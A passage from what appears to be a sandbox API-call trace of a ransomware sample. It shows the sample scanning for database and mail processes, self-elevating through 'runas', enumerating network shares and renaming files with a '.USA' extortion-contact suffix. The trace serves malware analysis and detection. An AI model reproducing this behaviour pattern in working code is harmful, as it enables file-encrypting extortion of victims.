szExeFile="svchost.exe")) returned 1 [0274.302] lstrlenW (lpString="svchost.exe") returned 11 [0274.302] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0274.302] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0274.302] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0274.302] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0274.302] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0274.302] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0274.302] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0274.302] Process32NextW (in: hSnapshot=0x3c0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.303] lstrlenW (lpString="svchost.exe") returned 11 [0274.303] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0274.303] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0274.303] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0274.303] Process32NextW (in: hSnapshot=0x3c0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0274.303] lstrlenW (lpString="audiodg.exe") returned 11 [0274.303] Process32NextW (in: hSnapshot=0x3c0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.303] lstrlenW (lpString="svchost.exe") returned 11 [0274.303] Process32NextW (in: hSnapshot=0x3c0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.304] lstrlenW (lpString="svchost.exe") returned 11 [0274.304] Process32NextW (in: hSnapshot=0x3c0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0274.304] lstrlenW (lpString="userinit.exe") returned 12 [0274.304] Process32NextW (in: hSnapshot=0x3c0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x44c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x348, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0274.304] lstrlenW (lpString="dwm.exe") returned 7 [0274.304] Process32NextW (in: hSnapshot=0x3c0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0274.304] lstrlenW (lpString="explorer.exe") returned 12 [0274.304] Process32NextW (in: hSnapshot=0x3c0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0274.305] lstrlenW (lpString="spoolsv.exe") returned 11 [0274.305] Process32NextW (in: hSnapshot=0x3c0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0274.305] lstrlenW (lpString="taskhost.exe") returned 12 [0274.305] Process32NextW (in: hSnapshot=0x3c0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.305] lstrlenW (lpString="svchost.exe") returned 11 [0274.305] Process32NextW (in: hSnapshot=0x3c0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="payload.exe")) returned 1 [0274.305] lstrlenW (lpString="payload.exe") returned 11 [0274.306] Process32NextW (in: hSnapshot=0x3c0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0274.306] lstrlenW (lpString="dllhost.exe") returned 11 [0274.306] Process32NextW (in: hSnapshot=0x3c0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0274.306] lstrlenW (lpString="reader_sl.exe") returned 13 [0274.306] Process32NextW (in: hSnapshot=0x3c0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0 [0274.306] CloseHandle (hObject=0x3c0) returned 1 [0274.306] Sleep (dwMilliseconds=0x1f4) Thread: id = 50 os_tid = 0x614 [0261.775] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x573838 [0261.775] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xfffe) returned 0x5b3fd8 [0261.776] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x573880 [0261.776] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x573880, Size=0x20) returned 0x559d50 [0261.776] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x573880 [0261.776] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x573880, Size=0x20) returned 0x559d78 [0261.776] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76890000 [0261.776] GetProcAddress (hModule=0x76890000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x768bd650 [0261.776] Wow64DisableWow64FsRedirection (in: OldValue=0x227ff28 | out: OldValue=0x227ff28*=0x0) returned 1 [0261.776] lstrlenW (lpString="kernel32.dll") returned 12 [0261.776] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x559d50 | out: hHeap=0x520000) returned 1 [0261.776] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0261.776] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x559d78 | out: hHeap=0x520000) returned 1 [0261.776] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5b3fd8, nSize=0x7fff | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\payload.exe")) returned 0x67 [0261.777] ShellExecuteExW (pExecInfo=0x227ff34*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.exe", lpParameters="-a", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) Thread: id = 51 os_tid = 0x618 [0261.779] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x573898 [0261.779] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x573898, Size=0x20) returned 0x559d78 [0261.779] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x559d78, Size=0x40) returned 0x55adf0 [0261.779] GetLogicalDrives () returned 0x4 [0261.779] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xfffe) returned 0x5c4650 [0261.780] GetComputerNameW (in: lpBuffer=0x5c4654, nSize=0x237ff6c | out: lpBuffer="XDUWTFONO", nSize=0x237ff6c) returned 1 [0261.780] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1000) returned 0x5d4658 [0261.780] WNetOpenEnumW (in: dwScope=0x3, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x237ff3c | out: lphEnum=0x237ff3c*=0x55a3f8) returned 0x0 [0261.780] WNetEnumResourceW (in: hEnum=0x55a3f8, lpcCount=0x237ff38, lpBuffer=0x5d4658, lpBufferSize=0x237ff40 | out: lpcCount=0x237ff38, lpBuffer=0x5d4658, lpBufferSize=0x237ff40) returned 0x103 [0261.780] WNetCloseEnum (hEnum=0x55a3f8) returned 0x0 [0261.780] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x237ff3c | out: lphEnum=0x237ff3c*=0x5d5d70) returned 0x0 [0263.588] WNetEnumResourceW (in: hEnum=0x5d5d70, lpcCount=0x237ff38, lpBuffer=0x5d4658, lpBufferSize=0x237ff40 | out: lpcCount=0x237ff38, lpBuffer=0x5d4658, lpBufferSize=0x237ff40) returned 0x0 [0263.588] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1000) returned 0x582ae8 [0263.588] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x5d4658, lphEnum=0x237ff10 | out: lphEnum=0x237ff10*=0x3581c78) returned 0x0 [0263.769] WNetEnumResourceW (in: hEnum=0x3581c78, lpcCount=0x237ff0c, lpBuffer=0x582ae8, lpBufferSize=0x237ff14 | out: lpcCount=0x237ff0c, lpBuffer=0x582ae8, lpBufferSize=0x237ff14) returned 0x103 [0263.769] WNetCloseEnum (hEnum=0x3581c78) returned 0x0 [0263.769] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1000) returned 0x35ba540 [0263.769] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x5d4678, lphEnum=0x237ff10 | out: lphEnum=0x237ff10*=0x0) returned 0xaa [0264.526] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1000) returned 0x4409e18 [0264.526] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x5d4698, lphEnum=0x237ff10 | out: lphEnum=0x237ff10*=0x0) returned 0x4c6 [0264.527] WNetEnumResourceW (in: hEnum=0x5d5d70, lpcCount=0x237ff38, lpBuffer=0x5d4658, lpBufferSize=0x237ff40 | out: lpcCount=0x237ff38, lpBuffer=0x5d4658, lpBufferSize=0x237ff40) returned 0x103 [0264.527] WNetCloseEnum (hEnum=0x5d5d70) returned 0x0 [0264.527] GetLogicalDrives () returned 0x4 [0264.527] Sleep (dwMilliseconds=0x64) [0264.731] GetLogicalDrives () returned 0x4 [0264.731] Sleep (dwMilliseconds=0x64) [0264.919] GetLogicalDrives () returned 0x4 [0264.919] Sleep (dwMilliseconds=0x64) [0265.134] GetLogicalDrives () returned 0x4 [0265.134] Sleep (dwMilliseconds=0x64) [0265.273] GetLogicalDrives () returned 0x4 [0265.273] Sleep (dwMilliseconds=0x64) [0265.565] GetLogicalDrives () returned 0x4 [0265.565] Sleep (dwMilliseconds=0x64) [0265.754] GetLogicalDrives () returned 0x4 [0265.755] Sleep (dwMilliseconds=0x64) [0265.864] GetLogicalDrives () returned 0x4 [0265.864] Sleep (dwMilliseconds=0x64) [0266.118] GetLogicalDrives () returned 0x4 [0266.118] Sleep (dwMilliseconds=0x64) [0266.270] GetLogicalDrives () returned 0x4 [0266.270] Sleep (dwMilliseconds=0x64) [0266.551] GetLogicalDrives () returned 0x4 [0266.551] Sleep (dwMilliseconds=0x64) [0266.786] GetLogicalDrives () returned 0x4 [0266.786] Sleep (dwMilliseconds=0x64) [0266.890] GetLogicalDrives () returned 0x4 [0266.890] Sleep (dwMilliseconds=0x64) [0267.007] GetLogicalDrives () returned 0x4 [0267.007] Sleep (dwMilliseconds=0x64) [0267.262] GetLogicalDrives () returned 0x4 [0267.262] Sleep (dwMilliseconds=0x64) [0267.385] GetLogicalDrives () returned 0x4 [0267.386] Sleep (dwMilliseconds=0x64) [0267.559] GetLogicalDrives () returned 0x4 [0267.559] Sleep (dwMilliseconds=0x64) [0267.764] GetLogicalDrives () returned 0x4 [0267.764] Sleep (dwMilliseconds=0x64) [0267.907] GetLogicalDrives () returned 0x4 [0267.907] Sleep (dwMilliseconds=0x64) [0268.102] GetLogicalDrives () returned 0x4 [0268.102] Sleep (dwMilliseconds=0x64) [0268.537] GetLogicalDrives () returned 0x4 [0268.537] Sleep (dwMilliseconds=0x64) [0268.648] GetLogicalDrives () returned 0x4 [0268.648] Sleep (dwMilliseconds=0x64) [0268.762] GetLogicalDrives () returned 0x4 [0268.762] Sleep (dwMilliseconds=0x64) [0269.124] GetLogicalDrives () returned 0x4 [0269.124] Sleep (dwMilliseconds=0x64) [0269.365] GetLogicalDrives () returned 0x4 [0269.365] Sleep (dwMilliseconds=0x64) [0269.817] GetLogicalDrives () returned 0x4 [0269.817] Sleep (dwMilliseconds=0x64) [0270.138] GetLogicalDrives () returned 0x4 [0270.138] Sleep (dwMilliseconds=0x64) [0270.289] GetLogicalDrives () returned 0x4 [0270.289] Sleep (dwMilliseconds=0x64) [0270.787] GetLogicalDrives () returned 0x4 [0270.787] Sleep (dwMilliseconds=0x64) [0270.953] GetLogicalDrives () returned 0x4 [0270.953] Sleep (dwMilliseconds=0x64) [0271.254] GetLogicalDrives () returned 0x4 [0271.254] Sleep (dwMilliseconds=0x64) [0271.425] GetLogicalDrives () returned 0x4 [0271.425] Sleep (dwMilliseconds=0x64) [0271.765] GetLogicalDrives () returned 0x4 [0271.765] Sleep (dwMilliseconds=0x64) [0271.915] GetLogicalDrives () returned 0x4 [0271.915] Sleep (dwMilliseconds=0x64) [0272.028] GetLogicalDrives () returned 0x4 [0272.028] Sleep (dwMilliseconds=0x64) [0272.251] GetLogicalDrives () returned 0x4 [0272.251] Sleep (dwMilliseconds=0x64) [0272.490] GetLogicalDrives () returned 0x4 [0272.490] Sleep (dwMilliseconds=0x64) [0272.700] GetLogicalDrives () returned 0x4 [0272.700] Sleep (dwMilliseconds=0x64) [0273.073] GetLogicalDrives () returned 0x4 [0273.073] Sleep (dwMilliseconds=0x64) [0273.248] GetLogicalDrives () returned 0x4 [0273.248] Sleep (dwMilliseconds=0x64) [0273.683] GetLogicalDrives () returned 0x4 [0273.683] Sleep (dwMilliseconds=0x64) [0274.135] GetLogicalDrives () returned 0x4 [0274.144] Sleep (dwMilliseconds=0x64) [0274.307] GetLogicalDrives () returned 0x4 [0274.307] Sleep (dwMilliseconds=0x64) Thread: id = 52 os_tid = 0x61c [0263.312] GetTickCount () returned 0x7270 [0263.313] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x24) returned 0x5d5db8 [0263.313] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x5d5db8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x130 [0263.318] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x5d5db8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x138 [0263.520] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x5d5db8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x13c [0263.521] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x5d5db8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x120 [0263.522] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5b32a8 [0263.522] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5b32a8, Size=0x20) returned 0x55a020 [0263.522] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5b32a8 [0263.522] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5b32a8, Size=0x20) returned 0x580300 [0263.522] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76890000 [0263.564] GetProcAddress (hModule=0x76890000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x768bd650 [0263.564] Wow64DisableWow64FsRedirection (in: OldValue=0x247ff84 | out: OldValue=0x247ff84*=0x0) returned 1 [0263.564] lstrlenW (lpString="kernel32.dll") returned 12 [0263.564] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x55a020 | out: hHeap=0x520000) returned 1 [0263.564] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0263.564] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x580300 | out: hHeap=0x520000) returned 1 [0263.564] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091a0, lpParameter=0x55eeb8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x15c [0263.565] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0263.738] GetTickCount () returned 0x736a [0263.738] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0263.978] GetTickCount () returned 0x7454 [0263.978] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0264.217] GetTickCount () returned 0x753e [0264.217] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0264.532] GetTickCount () returned 0x7676 [0264.532] GetTickCount () returned 0x7676 [0264.532] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0264.731] GetTickCount () returned 0x7741 [0264.731] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0264.919] GetTickCount () returned 0x77fc [0264.919] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0265.134] GetTickCount () returned 0x78c7 [0265.134] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0265.273] GetTickCount () returned 0x7953 [0265.273] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0265.566] GetTickCount () returned 0x7a6c [0265.566] GetTickCount () returned 0x7a6c [0265.566] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0265.754] GetTickCount () returned 0x7b27 [0265.754] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0265.861] GetTickCount () returned 0x7b95 [0265.861] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0266.118] GetTickCount () returned 0x7c8e [0266.118] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0266.271] GetTickCount () returned 0x7d2a [0266.271] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0266.551] GetTickCount () returned 0x7e33 [0266.551] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0266.786] GetTickCount () returned 0x7f1d [0266.786] GetTickCount () returned 0x7f1d [0266.786] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0266.890] GetTickCount () returned 0x7f8b [0266.890] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0267.007] GetTickCount () returned 0x7ff8 [0267.008] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0267.263] GetTickCount () returned 0x80f1 [0267.263] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0267.386] GetTickCount () returned 0x815f [0267.386] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0267.560] GetTickCount () returned 0x820a [0267.560] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0267.765] GetTickCount () returned 0x82d5 [0267.765] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0267.907] GetTickCount () returned 0x8352 [0267.907] GetTickCount () returned 0x8352 [0267.907] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0268.102] GetTickCount () returned 0x840d [0268.102] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0268.537] GetTickCount () returned 0x85c2 [0268.537] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0268.647] GetTickCount () returned 0x862f [0268.647] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0268.762] GetTickCount () returned 0x869c [0268.762] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0269.124] GetTickCount () returned 0x8803 [0269.124] GetTickCount () returned 0x8803 [0269.124] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0269.365] GetTickCount () returned 0x88ed [0269.365] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0269.817] GetTickCount () returned 0x8aa2 [0269.817] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0270.138] GetTickCount () returned 0x8bda [0270.138] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0270.289] GetTickCount () returned 0x8c66 [0270.289] GetTickCount () returned 0x8c66 [0270.289] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0270.786] GetTickCount () returned 0x8e4a [0270.786] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0270.954] GetTickCount () returned 0x8ee6 [0270.954] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0271.254] GetTickCount () returned 0x900e [0271.254] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0271.425] GetTickCount () returned 0x90ba [0271.425] GetTickCount () returned 0x90ba [0271.425] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0271.765] GetTickCount () returned 0x9211 [0271.765] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0271.915] GetTickCount () returned 0x929d [0271.915] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0272.028] GetTickCount () returned 0x931a [0272.028] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0272.251] GetTickCount () returned 0x93f5 [0272.251] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0272.489] GetTickCount () returned 0x94df [0272.489] GetTickCount () returned 0x94df [0272.489] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0272.699] GetTickCount () returned 0x95b9 [0272.699] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0273.073] GetTickCount () returned 0x972f [0273.073] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0273.248] GetTickCount () returned 0x97db [0273.248] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0273.683] GetTickCount () returned 0x9990 [0273.683] GetTickCount () returned 0x9990 [0273.683] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0274.144] GetTickCount () returned 0x9b54 [0274.145] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0274.307] GetTickCount () returned 0x9c00 [0274.307] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) Thread: id = 53 os_tid = 0x62c Thread: id = 56 os_tid = 0x670 [0263.589] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10000) returned 0x5e5df0 [0263.589] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10000) returned 0x5f5df8 [0263.590] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5b3410 [0263.590] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x6) returned 0x5b3788 [0263.590] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5b3428 [0263.590] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x100000) returned 0x3210020 [0263.590] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5b3440 [0263.590] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5b3440, Size=0x20) returned 0x5805f8 [0263.590] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5b3440 [0263.590] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5b3440, Size=0x20) returned 0x5805d0 [0263.590] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76890000 [0263.590] GetProcAddress (hModule=0x76890000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x768bd650 [0263.590] Wow64DisableWow64FsRedirection (in: OldValue=0x2abff58 | out: OldValue=0x2abff58*=0x0) returned 1 [0263.590] lstrlenW (lpString="kernel32.dll") returned 12 [0263.590] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5805f8 | out: hHeap=0x520000) returned 1 [0263.590] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0263.590] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5805d0 | out: hHeap=0x520000) returned 1 [0263.591] Sleep (dwMilliseconds=0x64) [0263.747] Sleep (dwMilliseconds=0x64) [0263.982] lstrcmpiW (lpString1=".dat", lpString2=".USA") returned -1 [0263.982] lstrlenW (lpString="bootsqm.dat") returned 11 [0263.982] CreateFileW (lpFileName="C:\\bootsqm.dat" (normalized: "c:\\bootsqm.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0264.021] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=3264) returned 1 [0264.022] CloseHandle (hObject=0x344) returned 1 [0264.022] GetFileAttributesW (lpFileName="C:\\bootsqm.dat" (normalized: "c:\\bootsqm.dat")) returned 0x80 [0264.022] GetFileAttributesW (lpFileName="C:\\bootsqm.dat.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\bootsqm.dat.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0264.022] CreateFileW (lpFileName="C:\\bootsqm.dat" (normalized: "c:\\bootsqm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0264.022] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0264.022] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0264.022] CreateFileW (lpFileName="C:\\bootsqm.dat.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\bootsqm.dat.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0264.023] GetLastError () returned 0x0 [0264.023] ReadFile (in: hFile=0x344, lpBuffer=0x3210020, 